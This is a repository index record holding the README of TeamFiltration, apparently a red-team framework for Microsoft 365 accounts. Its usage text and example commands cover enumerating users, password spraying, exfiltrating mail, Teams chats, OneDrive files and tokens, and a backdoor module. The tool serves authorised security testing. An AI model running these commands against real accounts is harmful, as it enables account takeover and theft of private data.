{"id":18831770,"url":"https://github.com/flangvik/teamfiltration","last_synced_at":"2025-05-16T03:04:31.477Z","repository":{"id":56761074,"uuid":"508097028","full_name":"Flangvik/TeamFiltration","owner":"Flangvik","description":"TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","archived":false,"fork":false,"pushed_at":"2025-04-10T13:48:00.000Z","size":1405,"stargazers_count":1139,"open_issues_count":4,"forks_count":127,"subscribers_count":11,"default_branch":"main","last_synced_at":"2025-05-12T02:05:17.080Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Flangvik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-06-28T00:00:28.000Z","updated_at":"2025-05-10T03:11:08.000Z","dependencies_parsed_at":"2023-02-16T20:00:36.717Z","dependency_job_id":"b500e8db-7be5-44e1-a4fa-8b8f8fed7294","html_url":"https://github.com/Flangvik/TeamFiltration","commit_stats":null,"previous_names":[],"tags_count":13,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration/manifests","owner_url":"https:/
/repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Flangvik","download_url":"https://codeload.github.com/Flangvik/TeamFiltration/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254459088,"owners_count":22074605,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T01:55:56.281Z","updated_at":"2025-05-16T03:04:31.471Z","avatar_url":"https://github.com/Flangvik.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n \u003cp align=\"center\"\u003e\n \u003cimg src=\"TFLogo.png\" width=\"500px\" alt=\"TeamFiltration\" /\u003e\n\u003c/p\u003e\n\n## TeamFiltration\n\nTeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 EntraID accounts.\nSee the [TeamFiltration](https://github.com/Flangvik/TeamFiltration/wiki/Home) wiki page for an introduction into how TeamFiltration works and the [Quick Start  Guide](https://github.com/Flangvik/TeamFiltration/wiki/Home#quick-start-guide) for how to get up and running!\n\nThis tool has been used internally at TrustedSec since January 2021 and was publicly released in my talk [Taking a Dump In The Cloud](https://youtu.be/GpZTQHLKelg) during DefCON30.\n\n## Download\n[You can download the latest precompiled release for Linux, Windows and MacOS ](https://github.com/Flangvik/TeamFiltration/releases/latest)   \n\n**The releases are precompiled into a single application-dependent binary. 
The size goes up, but you do not need .NET or any other dependencies to run them.**\n\n## Usage\n\n```\n\n  ╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╗\n ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤                              ╠╬╬╝╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬╣                              │      ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬╣                              ││      ╚╬╬╝╚ └╚╝╬╬╬╬╬╬\n╬╬╬╬╣         ╔╦╦╬╬╬╬╬╬╦╦╗         ││       │        ╬╬╬╬╬\n╬╬╬╬╣     ╔╬╬╬╝╝┘      ╚╝╝╬╬╬┐     ││       ││       └╬╬╬╬\n╬╬╬╬┤    ╬╬╝╚╩╬╗╔          ╚╬╬╬    ││       ││        ╬╬╬╬\n╬╬╬╬┤   ╬╝      ╚╬╬╗╗ ╔      ╚╬╗   ││      ├││        ╬╬╬╬\n╬╬╬╬┤  ╬╬     ╔╗   ╚╬╬╬╬╬╬╦    ╬╬  │┌    ╔╬┤││       ╔╬╬╬╬\n╬╬╬╬┤ ╔╬┤     ╬╬╬   ╬╬╬╬╬╬╬╬╝╝╝╬╬╗ ╠╬╬╬╬╬╬╬╬╬╗      ┌╬╬╬╬╬\n╬╬╬╬┤ ╬╬┤     ╚╩┘   ╚╬╬╬╬╬╩    ╠╬╬ ╚╝╝╝╝╝╝╝╝╝╬╬╗╗╗╦╬╬╬╬╬╬╬\n╬╬╬╬┤ ╬╬┤                      ╠╬╬ ││         ╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤  ╬╬   ╦╗            ╗╗   ╬╬  ││         │       ╬╬╬╬\n╬╬╬╬┤  └╬┐   ╚╬╗╗      ╔╬╬╝   ╔╬┘  ││         │       ╬╬╬╬\n╬╬╬╬┤   └╬╗    ╚╩╩╬╬╬╩╩╝╝   ╔╬╬    ││         │       ╬╬╬╬\n╬╬╬╬┤    ╚╬╬╬╗           ┌╗╬╬╝┘    ││         │       ╬╬╬╬\n╬╬╬╬┤       ╚╩╬╬╬╦╦╦╦╦╦╬╬╬╝╝       ││         │       ╬╬╬╬\n╬╬╬╬┤            ╚╚╝╝╝╝            ││         │       ╬╬╬╬\n╬╬╬╬┤                              ││         │    ╔╗╬╬╬╬╬\n╬╬╬╬┤                              ││         ╬╦╦╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤                              ││     ╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤                              ╬╬╬╗╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n └╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╝\n   ╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝\n\n[❤] TeamFiltration V3.5.5 PUBLIC, created by @Flangvik at @TrustedSec\n[+] Args parsed \nUsage:\n\n   --outpath     Output path to store database and exfiltrated information (Needed for all modules)\n\n   --config      Local path to your TeamFiltration.json configuration file, if not provided will load from the current path\n\n   --exfil   
    Load the exfiltration module\n\n         --username            Override to target a given username that does not exist in the database\n         --password            Override to target a given password that does not exist in the database\n         --tokens              Override to target a (file with newline seperated JWT tokens|single JWT| , seperated JWT tokens) and perfom exfiltration\n         --cookie-dump         Override to target a given account using it's refresh-cookie-collection\n\n         --all                 Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)\n         --aad                 Exfiltrate information from Graph API (domain users and groups)\n         --teams               Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)\n         --teams-db            Exfiltrate cookies and authentication tokens from an exfiltrated Teams database\n         --onedrive            Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the users entire OneDrive directory)\n         --owa                 Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received) \n               --owa-limit          Set the max amount of emails to exfiltrate, default is 2k.\n         --jwt-tokens          Dump all gathered JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams)\n\n   --spray       Load the spraying module\n\n         --aad-sso             Use SecureWorks's Azure Active Directory password brute-forcing technique when spraying\n         --us-cloud            When spraying companies attached to US Tenants (https://login.microsoftonline.us/)\n\n         --passwords           Path to a list of passwords, common weak-passwords will be generated if not supplied\n         --exclude             Path to a list of emails to exclude from spraying\n         --seasons-only        Password 
genersated for spraying will only be based on seasons\n         --months-only         Password generated for spraying will only be based on months\n         --common-only         Spray with the top 20 most common passwords\n         --shuffle-passwords   Shuffle the passwordlist before spraying\n         --shuffle-users       Shuffle the target userlist before spraying\n         --shuffle-regions     Shuffle FireProx regions when spraying\n\n         --auto-exfil          If valid login is found, auto start the exfil module\n\n         --sleep-min           Minimum minutes to sleep between each full rotation of spraying default=60\n         --sleep-max           Maximum minutes to sleep between each full rotation of spraying default=100\n         --jitter              Seconds between each individual authentication attempt. default=0\n         --time-window         Defines a time windows where spraying should accour, in the military time format \u003c12:00-19:00\u003e\n         --push                Get Pushover notifications when valid credentials are found (requires pushover keys in config)\n         --push-locked         Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)\n         --force               Force the spraying to proceed even if there is less the \u003csleep\u003e time since the last attempt\n\n   --enum        Load the enumeration module\n\n         --domain              Domain to perfom enumeration against, names pulled from statistically-likely-usernames if not provided with --usernames\n         --usernames           Path to a list of usernames to enumerate (emails)\n         --dehashed            Use the dehashed submodule in order to enumerate emails from a basedomain\n         --validate-msol       Validate that the given o365 accounts exists using the public GetCredentialType method (Very RateLimited - Slow 20 e/s)\n         --validate-teams      Validate that the given o365 accounts exists using 
the Teams API method (Recommended - Super Fast 300 e/s)\n         --validate-login      Validate that the given o365 accounts by attemping to login (Noisy - triggers logins - Fast 100 e/s)\n         --validate-onedrive   Validate that the given o365 accounts using @nyxgeek OneDrive method (Recommended - Fast 300 e/s\n\n   --backdoor        Loads the interactive backdoor module\n\n   --database        Loads the interactive database browser module\n\n   --debug           Proxy all outgoing HTTP requests through the proxy specified in the config\n\n   Examples:\n\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\\Clients\\FooBar\\Exclude_Emails.txt\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --spray --passwords C:\\Clients\\2021\\FooBar\\Generic\\Passwords.txt --time-window 13:00-22:00\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\\\CookieData.txt --all\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --aad \n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --tokens C:\\\\OutputTokens.txt --onedrive --owa\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --debug --exfil --onedrive\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --enum --validate-onedrive --domain example.com\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\\Clients\\FooBar\\OSINT\\Usernames.txt\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json 
--backdoor\n        --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --database\n\n```\n\n## Credits\n\n- [GitHub - KoenZomers/OneDriveAPI: API in .NET to communicate with OneDrive Personal and OneDrive for Business](https://github.com/KoenZomers/OneDriveAPI)\n- [Research into Undocumented Behavior of Azure AD Refresh Tokens ](https://github.com/secureworks/family-of-client-ids-research) \n- [AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation](https://github.com/ustayready/fireprox)\n- Credits to [Ryan](https://twitter.com/detectdotdev) for validating and discussing my observations / questions!\n- The entire [TrustedSec](https://TrustedSec.com) team for helping me polish this tool! \n- The OneDrive enumeration method found by @nyxgeek and script [onedrive_user_enum](https://github.com/nyxgeek/onedrive_user_enum)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fteamfiltration","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflangvik%2Fteamfiltration","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fteamfiltration/lists"}